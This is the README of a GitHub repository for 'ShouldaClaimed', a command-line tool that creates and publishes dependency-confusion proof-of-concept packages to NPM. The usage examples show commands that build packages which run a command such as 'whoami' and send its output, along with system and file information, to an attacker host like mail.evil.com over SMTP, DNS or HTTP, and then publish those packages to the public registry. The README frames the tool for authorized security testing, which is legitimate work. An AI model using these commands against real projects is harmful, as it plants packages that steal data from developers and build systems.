Skip to content

A3-N/ShouldaClaimed

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
pkg
pkg
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 
main.go
main.go
 
 

Repository files navigation

ShouldaClaimed

A CLI tool for generating and publishing Dependency Confusion Proof-of-Concepts (POCs) to NPM.

Install

go install github.com/A3-N/ShouldaClaimed@latest

Usage

1. Create Payload (No Publish)

Generate a package to inspect the code or publish manually later.

RCE with Exfiltration: Execute a command and send the output back via the selected protocol.

# Run 'whoami' and send output via SMTP
ShouldaClaimed create -t internal-utils -p smtp -s mail.evil.com:25 -r "whoami"

Standard Exfiltration (System & File Info):

# DNS (Chunked for reliability)
ShouldaClaimed create -t internal-utils -p dns -s your-collab.net

# HTTP
ShouldaClaimed create -t internal-utils -p http -s http://your-collab.net

2. Create & Publish

Generates the package, handles authentication, and publishes to the NPM registry in one go.

ShouldaClaimed publish -t internal-utils -p dns -s your-collab.net

Note: This command verifies npm is installed, the package doesn't already exist in the registry (to avoid collision), and performs npm login if not authenticated.

Example Output

.▄▄ ·  ▄ .▄      ▄• ▄▌▄▄▌  ·▄▄▄▄   ▄▄▄· 
▐█ ▀. ██▪▐█▪     █▪██▌██•  ██▪ ██ ▐█ ▀█ 
▄▀▀▀█▄██▀▐█ ▄█▀▄ █▌▐█▌██▪  ▐█· ▐█▌▄█▀▀█ 
▐█▄▪▐███▌▐▀▐█▌.▐▌▐█▄█▌▐█▌▐▌██. ██ ▐█ ▪▐▌
 ▀▀▀▀ ▀▀▀ · ▀█▄▀▪ ▀▀▀ .▀▀▀ ▀▀▀▀▀•  ▀  ▀ 
 ▄▄· ▄▄▌   ▄▄▄· ▪  • ▌ ▄ ·. ▄▄▄ .·▄▄▄▄  
▐█ ▌▪██•  ▐█ ▀█ ██ ·██ ▐███▪▀▄.▀·██▪ ██ 
██ ▄▄██▪  ▄█▀▀█ ▐█·▐█ ▌▐▌▐█·▐▀▀▪▄▐█· ▐█▌
▐███▌▐█▌▐▌▐█ ▪▐▌▐█▌██ ██▌▐█▌▐█▄▄▌██. ██ 
·▀▀▀ .▀▀▀  ▀  ▀ ▀▀▀▀▀  █▪▀▀▀ ▀▀▀ ▀▀▀▀▀• 
			            github.com/A3-N
[INF] ShouldaClaimed CLI initialized
[INF] Ensuring NPM authentication...
[INF] Creating package structure in ./internal-utils
[SUC] Created payload: index.js
[SUC] Created package.json
[INF] Publishing package from ./internal-utils...
npm notice
npm notice 📦  internal-utils@1.0.0
npm notice === Tarball Details ===
npm notice name:          internal-utils
npm notice version:       1.0.0
npm notice filename:      internal-utils-1.0.0.tgz
npm notice package size:  1.2 kB
npm notice unpacked size: 2.5 kB
npm notice shasum:        ...
npm notice integrity:     ...
npm notice total files:   2
npm notice
+ internal-utils@1.0.0
[SUC] Package published successfully!

Flags

Flag Long Description
-t --target Required. Target package name.
-p --poc Protocol: dns, http, smtp.
-s --server Exfiltration server URI (e.g., collab.net, http://...).
-r --rce Command to execute. If set, output is exfiltrated via -p.
-o --out Output directory (default: .).
-f --force Skip pre-flight checks (NPM installed? Registry collision?).

Authorized use only

This project is intended for authorized security testing and research only.

You may use it only when you have explicit, written permission from the asset owner (or you are the owner). Misuse of this tool may violate laws, contracts, and acceptable-use policies. The authors and contributors assume no liability for misuse.

About

MineNow

Resources

Readme

License

GPL-3.0 license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

2 tags

Packages

No packages published

Languages